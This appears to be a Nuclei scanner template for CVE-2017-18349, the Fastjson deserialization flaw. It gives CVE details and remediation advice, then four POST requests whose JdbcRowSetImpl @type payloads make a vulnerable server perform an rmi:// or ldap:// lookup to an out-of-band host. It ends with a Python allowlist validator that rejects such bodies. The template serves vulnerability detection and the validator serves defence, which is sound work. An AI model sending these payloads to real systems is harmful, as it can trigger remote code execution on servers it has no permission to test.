parseObject in Fastjson before 1.2.25, as used in FastjsonEngine in Pippo 1.11.0 and other products, allows remote attackers to execute arbitrary code via a crafted JSON request, as demonstrated by a crafted rmi-// URI in the dataSourceName field of HTTP POST data to the Pippo /json URI, which is mishandled in AjaxApplication.java.
PoC code [publicly available]
id: CVE-2017-18349

info:
  name: Fastjson Insecure Deserialization - Remote Code Execution
  author: night
  severity: critical
  description: |
    parseObject in Fastjson before 1.2.25, as used in FastjsonEngine in Pippo 1.11.0 and other products, allows remote attackers to execute arbitrary code via a crafted JSON request, as demonstrated by a crafted rmi-// URI in the dataSourceName field of HTTP POST data to the Pippo /json URI, which is mishandled in AjaxApplication.java.
  impact: |
    Successful exploitation allows complete system compromise through remote code execution, enabling attackers to execute arbitrary commands, access sensitive data, and establish persistent backdoors on the target system.
  remediation: |
    Update Fastjson to version 1.2.25 or later, which includes security patches for this vulnerability. Disable autotype functionality by setting `fastjson.parser.autoTypeSupport=false`. Implement strict whitelist filtering for `@type` annotations, and validate and sanitize all JSON input. Use Web Application Firewalls (WAF) to filter malicious requests, and regularly audit dependencies for known vulnerabilities. Consider migrating to safer JSON parsing libraries like Jackson with secure configurations.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2017-18349
    - https://github.com/alibaba/fastjson/wiki/security_update_20170315
    - https://github.com/pippo-java/pippo/issues/466
    - https://github.com/h0cksr/Fastjson--CVE-2017-18349-
    - https://fortiguard.com/encyclopedia/ips/44059
    - https://www.exploit-db.com/exploits/45983
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2017-18349
    cwe-id: CWE-20
    epss-score: 0.90735
    epss-percentile: 0.99604
    cpe: cpe:2.3:a:alibaba:fastjson:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    vendor: alibaba
    product: fastjson
  tags: cve,cve2017,fastjson,deserialization,rce,oob,oast

variables:
  rmi_payload: "rmi://{{interactsh-url}}/{{randstr}}"
  ldap_payload: "ldap://{{interactsh-url}}/{{randstr}}"

http:
  - method: POST
    path:
      - "{{BaseURL}}/json"
      - "{{BaseURL}}/api/json"
    headers:
      Content-Type: application/json
      Accept: application/json
    body: |
      {
        "@type": "com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName": "{{rmi_payload}}",
        "autoCommit": true
      }
    stop-at-first-match: true
    matchers:
      - type: dsl
        dsl:
          - "contains(interactsh_protocol,'dns')"
          - "contains(content_type, 'application/json')"
          - "contains_all(body, 'autoCommit','set property error')"
        condition: and
    extractors:
      - type: kval
        kval:
          - interactsh_ip

  - method: POST
    path:
      - "{{BaseURL}}/json"
      - "{{BaseURL}}/api/json"
      - "{{BaseURL}}/parse"
      - "{{BaseURL}}/deserialize"
    headers:
      Content-Type: application/json
      Accept: application/json
    body: |
      {
        "@type": "com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName": "{{ldap_payload}}",
        "autoCommit": true
      }
    stop-at-first-match: true
    matchers:
      - type: dsl
        dsl:
          - "contains(interactsh_protocol,'dns')"
          - "contains(content_type, 'application/json')"
          - "contains_all(body, 'autoCommit','set property error')"
        condition: and
    extractors:
      - type: kval
        kval:
          - interactsh_ip

  - method: POST
    path:
      - "{{BaseURL}}/json"
      - "{{BaseURL}}/api/json"
      - "{{BaseURL}}/parse"
      - "{{BaseURL}}/deserialize"
    headers:
      Content-Type: application/json
      Accept: application/json
    body: |
      {
        "data": {
          "@type": "com.sun.rowset.JdbcRowSetImpl",
          "dataSourceName": "{{rmi_payload}}",
          "autoCommit": true
        }
      }
    stop-at-first-match: true
    matchers:
      - type: dsl
        dsl:
          - "contains(interactsh_protocol,'dns')"
          - "contains(content_type, 'application/json')"
          - "contains_all(body, 'autoCommit','set property error')"
        condition: and
    extractors:
      - type: kval
        kval:
          - interactsh_ip

  - method: POST
    path:
      - "{{BaseURL}}/json"
    headers:
      Content-Type: application/json
      Accept: application/json
    body: |
      {
        "b": {
          "@type": "com.sun.rowset.JdbcRowSetImpl",
          "dataSourceName": "{{ldap_payload}}",
          "autoCommit": true
        }
      }
    stop-at-first-match: true
    matchers:
      - type: dsl
        dsl:
          - "contains(interactsh_protocol,'dns')"
          - "contains(content_type, 'application/json')"
          - "contains_all(body, 'autoCommit','set property error')"
        condition: and
    extractors:
      - type: kval
        kval:
          - interactsh_ip
# digest: 4a0a00473045022100ec29aeb993060e03a04d6c6dc6a2b86115ec98b0236f297a46ba18680032bf05022007a4c76ad8d764a70ace521db6f406d9e9b59f45410f31532b1b076c1fb9c48d:922c64590222798bb761d5b6d8e72950
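The `@type` allowlist and input validation that the remediation above calls for, as an added example in Python (not code from the page, from Fastjson or from the Nuclei project): it walks a request body before it reaches the parser, flags any `@type` outside an allowlist and any string carrying a JNDI-style URI, at any nesting depth, which is what the template's bare, `data`-wrapped and `b`-wrapped payloads rely on. The allowed class name, the endpoint gate and the sample bodies are constructed assumptions.

```python
import json
from urllib.parse import urlsplit

# Constructed allowlist: the only @type values this application accepts (assumption).
ALLOWED_TYPES = {"com.example.api.OrderRequest"}
# URI schemes that JdbcRowSetImpl resolves through JNDI (the page's rmi:// and ldap:// payloads).
JNDI_SCHEMES = {"rmi", "ldap", "ldaps", "iiop"}


def find_type_violations(node, path="$"):
    """Walk a parsed JSON document and report every @type whose value is not
    allowlisted and every string value that is a JNDI-style URI. Fastjson
    honours @type at any depth, so the walk is recursive (cf. the "data"
    and "b" wrappers in the template above)."""
    findings = []
    if isinstance(node, dict):
        for key, value in node.items():
            child = f"{path}.{key}"
            if key == "@type" and value not in ALLOWED_TYPES:
                findings.append((child, f"unexpected @type {value!r}"))
            elif isinstance(value, str) and urlsplit(value).scheme.lower() in JNDI_SCHEMES:
                findings.append((child, f"JNDI URI {value!r}"))
            else:
                findings.extend(find_type_violations(value, child))
    elif isinstance(node, list):
        for i, item in enumerate(node):
            findings.extend(find_type_violations(item, f"{path}[{i}]"))
    return findings


def is_safe_request_body(raw):
    """Gate for the /json endpoint: returns (ok, findings); reject before parseObject runs."""
    try:
        doc = json.loads(raw)
    except ValueError:
        return False, [("$", "invalid JSON")]
    findings = find_type_violations(doc)
    return not findings, findings


# Constructed sample bodies mirroring the template's shapes (not real traffic).
SAMPLE_TOP = ('{"@type": "com.sun.rowset.JdbcRowSetImpl", '
              '"dataSourceName": "rmi://oast.example/x", "autoCommit": true}')
SAMPLE_NESTED = ('{"b": {"@type": "com.sun.rowset.JdbcRowSetImpl", '
                 '"dataSourceName": "ldap://oast.example/x", "autoCommit": true}}')
SAMPLE_BENIGN = '{"@type": "com.example.api.OrderRequest", "id": 7, "note": "ship by friday"}'

if __name__ == "__main__":
    for body in (SAMPLE_TOP, SAMPLE_NESTED, SAMPLE_BENIGN):
        print(is_safe_request_body(body))
```

Fastjson 1.2.25 and later refuse unknown `@type` values when autotype is disabled; a gate like this one is the application-level whitelist the remediation asks for, and it also catches the JNDI URI independently of which class name is used.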